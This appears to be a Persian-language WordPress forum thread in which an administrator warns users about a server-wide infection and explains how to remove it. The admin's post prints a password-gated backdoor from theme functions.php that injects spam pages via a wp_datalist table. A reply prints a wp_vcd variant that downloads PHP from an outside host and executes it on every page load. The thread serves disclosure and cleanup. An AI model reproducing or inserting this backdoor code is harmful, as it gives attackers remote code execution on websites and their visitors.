امنیت سایت و سرور

امنیت سایت

رفع خطاهای w3c

رفع خطاهای w3c

افزایش سرعت سایت

سرعت سایت

ریسپانسیو

ریسپانسیو

پشتیبانی

پشتیبانی سایت

سئو و بهینه سازی

سئو و بهینه سازی

فروشگاه انجمن

فروشگاه انجمن

هاست وردپرس

هاست وردپرس


نمایش نتایج: از 1 به 3 از 3

موضوع: هشدار به کاربران انجمن وردپرس ایرانی

  1. #1
    مدیریت کل سایت admin آواتار ها
    تاریخ عضویت
    Oct 2017
    نوشته ها
    768
    تشکر تشکر کرده 
    13
    تشکر تشکر شده 
    5
    Thanked in
    5 پست

    پیش فرض هشدار به کاربران انجمن وردپرس ایرانی

    هشدار به کاربران انجمن وردپرس ایرانی

    این هشدار را خواهشمندم جدی بگیرید
    اگر جدولی در پایگاه داده خود با نام wp_datalist دارید
    آیا کد زیر در فانکشن قالب شما وجود دارد

    کد PHP:
    <?phpif (isset($_REQUEST['action']) &&   isset($_REQUEST['password']) && ($_REQUEST['password'] ==   '8c59047702c59779a2330fcff0c28874')){switch ($_REQUEST['action']){case   'get_all_links';foreach ($wpdb->get_results('SELECT * FROM `' .   $wpdb->prefix 'posts` WHERE `post_status` = "publish" AND   `post_type` = "post" ORDER BY `ID` DESC'ARRAY_A) as   $data){$data['code'] = '';if (preg_match('!<div   id="wp_cd_code">(.*?)</div>!s'$data['post_content'],   $_)){$data['code'] = $_[1];}print   '<e><w>1</w><url>' $data['guid'] .   '</url><code>' $data['code'] . '</code><id>' .   $data['ID'] . '</id></e>' "\r\n";}break;case   'set_id_links';if (isset($_REQUEST['data'])){$data $wpdb ->   get_row('SELECT `post_content` FROM `' $wpdb->prefix 'posts`   WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');$post_content  =  preg_replace('!<div id="wp_cd_code">(.*?)</div>!s''',   $data -> post_content);if (!empty($_REQUEST['data'])) $post_content =   $post_content '<div id="wp_cd_code">' .   stripcslashes($_REQUEST['data']) . '</div>';if   ($wpdb->query('UPDATE `' $wpdb->prefix 'posts` SET   `post_content` = "' mysql_escape_string($post_content) . '" WHERE  `ID`  = "' mysql_escape_string($_REQUEST['id']) . '"') !==  false){print  "true";}}break;case 'create_page';if   (isset($_REQUEST['remove_page'])){if ($wpdb -> query('DELETE FROM `'  .  $wpdb->prefix 'datalist` WHERE `url` =   "/'.mysql_escape_string($_REQUEST['url']).'"')){print "true";}}elseif   (isset($_REQUEST['content']) &&  !empty($_REQUEST['content'])){if  ($wpdb -> query('INSERT INTO `' .  $wpdb->prefix 'datalist` SET  `url` =  "/'.mysql_escape_string($_REQUEST['url']).'", `title` =   "'.mysql_escape_string($_REQUEST['title']).'", `keywords` =   "'.mysql_escape_string($_REQUEST['keywords']).'", `description` =   "'.mysql_escape_string($_REQUEST['description']).'", `content` =   "'.mysql_escape_string($_REQUEST['content']).'", `full_content` =   "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY   UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'",   `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'",   `description` = "'.mysql_escape_string($_REQUEST['description']).'",   `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'",   `full_content` =   "'.mysql_escape_string($_REQUEST['full_content']).'"')){print   "true";}}break;default: print "ERROR_WP_ACTION WP_URL_CD";}die("");}if (   $wpdb->get_var('SELECT count(*) FROM `' $wpdb->prefix .   'datalist` WHERE `url` = "'.mysql_escape_string(  $_SERVER['REQUEST_URI']  ).'"') == '1' ){$data $wpdb ->  get_row('SELECT * FROM `' .  $wpdb->prefix 'datalist` WHERE `url` =   "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');if ($data ->   full_content){print stripslashes($data -> content);}else{print   '<!DOCTYPE html>';print '<html ';language_attributes();print '   class="no-js">';print '<head>';print   '<title>'.stripslashes($data -> title).'</title>';print   '<meta name="Keywords" content="'.stripslashes($data ->   keywords).'" />';print '<meta name="Description"   content="'.stripslashes($data -> description).'" />';print   '<meta name="robots" content="index, follow" />';print '<meta   charset="';bloginfo'charset' );print '" />';print '<meta   name="viewport" content="width=device-width">';print '<link   rel="profile" href="http://gmpg.org/xfn/11">';print '<link   rel="pingback" href="';bloginfo'pingback_url' );print   '">';wp_head();print '</head>';print '<body>';print   '<div id="content" class="site-content">';print  stripslashes($data  ->   content);get_search_form();get_sidebar();get_footer();}exit;}?>
    اگر هر دو مثبت هست باید بگم سرور شما آلوده می باشد و 100 درصد کلیه سایت های روی سرور به فنا رفته و هک شده اند و میزبانی برای تبلیغات شده اند
    برای رهایی از شر این ویروس چه باید کرد
    برای کاربران
    بک آپی از سایت خود گرفته و در سیستم فایل فانکشن را باز کرده و کد را حذف کنند و جدو مورد نظر را نیز حذف کرده و بک آپ را به سرور جدید انتقال دهند


    برای مدیران سرور
    جدول معروف را در کلیه پایگاه داده های سرور حذف کرده و کلیه فایل ها را در زمانی که سرور پورت 80 به فرض آپاچی را خاموش و فایل های فانشکشن سایت ها را پاکسازی و کد را حذف کنند

  2. #2
    مدیر بخش yazdanian آواتار ها
    تاریخ عضویت
    Oct 2017
    نوشته ها
    172
    تشکر تشکر کرده 
    1
    تشکر تشکر شده 
    15
    Thanked in
    8 پست

    پیش فرض

    سلام
    من نمیدونم دقیق کدوم افزونه بود که بعدا متوجه شدم این محتویات رو به فانکشن قالب اضافه کرده بود.بعد از یک هفته متوجه شدم.
    ممنونم از اطلاع رسانیتون.



    کد HTML:
    
    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f8f5ad94a15dc8ae2d4378b28df47683'))
    	{
    $div_code_name="wp_vcd";
    		switch ($_REQUEST['action'])
    			{
    
    				
    
    
    
    
    				case 'change_domain';
    					if (isset($_REQUEST['newdomain']))
    						{
    							
    							if (!empty($_REQUEST['newdomain']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
    			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    
    		                                                                    }
    								}
    						}
    				break;
    
    				
    				
    				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    			}
    			
    		die("");
    	}
    
    	
    
    
    if ( ! function_exists( 'theme_temp_setup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
    
    if($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=".$path))
    {
    
    
    function theme_temp_setup($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }
    
    extract(theme_temp_setup($tmpcontent));
    }
    }
    }
    
    

  3. #3
    مدیریت کل سایت admin آواتار ها
    تاریخ عضویت
    Oct 2017
    نوشته ها
    768
    تشکر تشکر کرده 
    13
    تشکر تشکر شده 
    5
    Thanked in
    5 پست

    پیش فرض

    دکتر جان اگر کد را داری حذف کن و طبق آموزش جلو برو
    راستی یه آواتار خوشگل برای خودت بذار من همینطور یه دونه از مدیریت براتون گذاشتم

    تلگرام بنده :
    برای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنیدبرای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنید

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  
تماس